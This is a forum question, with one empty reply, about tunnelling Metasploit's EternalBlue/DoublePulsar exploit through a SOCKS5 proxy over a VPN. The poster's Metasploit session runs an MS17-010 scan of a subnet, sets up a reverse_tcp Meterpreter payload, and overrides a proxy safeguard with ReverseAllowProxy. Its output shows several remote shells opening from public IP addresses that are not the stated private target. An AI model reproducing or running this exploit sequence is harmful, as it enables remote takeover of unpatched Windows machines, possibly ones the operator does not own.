Can eternalblue run through a socks4 or 5 proxy?

[staggerlee]

Hi all,

I am trying to run some personal ms17_101 pen testing, over a socks5 proxy which is port forwarded over a (VPN).

The primary issue I am trying to resolve is getting eternalblue data to traverse the socks proxy using "set ReverseAllowProxy true", it may be a case where is it not even supported.
The socks setup itself does work, I am able to run the setup on Windows and successfully tunnel (IP range scan) through the tunnel using Proxify.
It looks like the route is attempting to use the public IP address of the sock proxy and/or target machine, rather than the loopback socks path.

Below, I have added some out the output and examples of the config/method I am attempting. This is my first attempt a this.

A couple of things to note:
I have removed the public IP addresses from the output.
I have attempted setting PROCESSINJECT = lsass.exe and also TARGETARCHITECTURE = x64 .... These gave the same results as posted.
10.7.0.62 is the private address of tun0/vpn
port 8484 is open through the vpn via port forwarding. It is not in use prior to running.
Kali Version - 2020.1
Kali Installation - Virtubox VM , running installed version.

       =[ metasploit v5.0.70-dev                          ]
+ -- --=[ 1961 exploits - 1091 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > setg Proxies socks5:127.0.0.1:57366
Proxies => socks5:127.0.0.1:57366
msf5 > use auxiliary/scanner/smb/smb_ms17_010 
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.2.1/24
rhosts => 192.168.2.1/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 64
threads => 64
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit -j
[*] Auxiliary module running as background job 0.
msf5 auxiliary(scanner/smb/smb_ms17_010) > 
[*] 192.168.2.1/24:445    - Scanned  34 of 256 hosts (13% complete)
[*] 192.168.2.1/24:445    - Scanned  60 of 256 hosts (23% complete)
[+] 192.168.2.103:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.100:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.106:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit) 

----------
---EXAMPLE of detected hosts---
----------
----------
----------
----------

msf5 exploit(windows/smb/eternalblue_doublepulsar) > use exploit/windows/smb/eternalblue_doublepulsar 
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[-] 192.168.2.103:445 - Exploit failed: RuntimeError TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour.
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set ReverseAllowProxy true
ReverseAllowProxy => true

----------
---EXAMPLE of adding setting ReverseAllowProxy true---
----------
----------
----------
----------

sf5 exploit(windows/smb/eternalblue_doublepulsar) > options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                  Required  Description
   ----                ---------------                                  --------  -----------
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       explorer.exe                                     yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOSTS              192.168.2.103                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               445                                              yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.7.0.62        yes       The listen address (an interface may be specified)
   LPORT     8484             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   8   Windows 7 (all services pack) (x86) (x64)


msf5 exploit(windows/smb/eternalblue_doublepulsar) > 

----------
---EXAMPLE of set options---
----------
----------
----------
----------

msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.7.0.62:8484 
msf5 exploit(windows/smb/eternalblue_doublepulsar) > [*] 192.168.2.103:445 - Generating Eternalblue XML data
[*] 192.168.2.103:445 - Generating Doublepulsar XML data
[*] 192.168.2.103:445 - Generating payload DLL for Doublepulsar
[*] 192.168.2.103:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.2.103:445 - Launching Eternalblue...
[*] Sending stage (180291 bytes) to 45.x.x.x
[*] Meterpreter session 1 opened (10.7.0.62:8484 -> 45.x.x.x:52873) at 2020-01-23 09:59:22 +0000
[*] Sending stage (180291 bytes) to 45.x.x.x
[*] Meterpreter session 2 opened (10.7.0.62:8484 -> 45.x.x.x:52872) at 2020-01-23 09:59:24 +0000
[*] Sending stage (180291 bytes) to 115.x.x.x
[*] 192.168.2.103 - Meterpreter session 2 closed.  Reason: Died
[*] Meterpreter session 3 opened (10.7.0.62:8484 -> 115.x.x.x:51837) at 2020-01-23 09:59:25 +0000
[*] Sending stage (180291 bytes) to 45.x.x.x
[*] 192.168.2.103 - Meterpreter session 3 closed.  Reason: Died
[*] Meterpreter session 4 opened (10.7.0.62:8484 -> 45.x.x.x:52874) at 2020-01-23 09:59:27 +0000
[*] Sending stage (180291 bytes) to 115.x.x.x
[*] 192.168.2.103 - Meterpreter session 4 closed.  Reason: Died
[*] Meterpreter session 5 opened (10.7.0.62:8484 -> 115.x.x.x:51838) at 2020-01-23 09:59:29 +0000
[*] Sending stage (180291 bytes) to 45.x.x.x
[*] 192.168.2.103 - Meterpreter session 5 closed.  Reason: Died
[*] Meterpreter session 6 opened (10.7.0.62:8484 -> 45.x.x.x:52876) at 2020-01-23 09:59:30 +0000
[*] Sending stage (180291 bytes) to 115.x.x.x
[*] 192.168.2.103 - Meterpreter session 6 closed.  Reason: Died
[*] Meterpreter session 7 opened (10.7.0.62:8484 -> 115.x.x.x:51839) at 2020-01-23 09:59:31 +0000

 

[NazonEjil]

Hi there! Thanks for the question, I've also searched for it recently.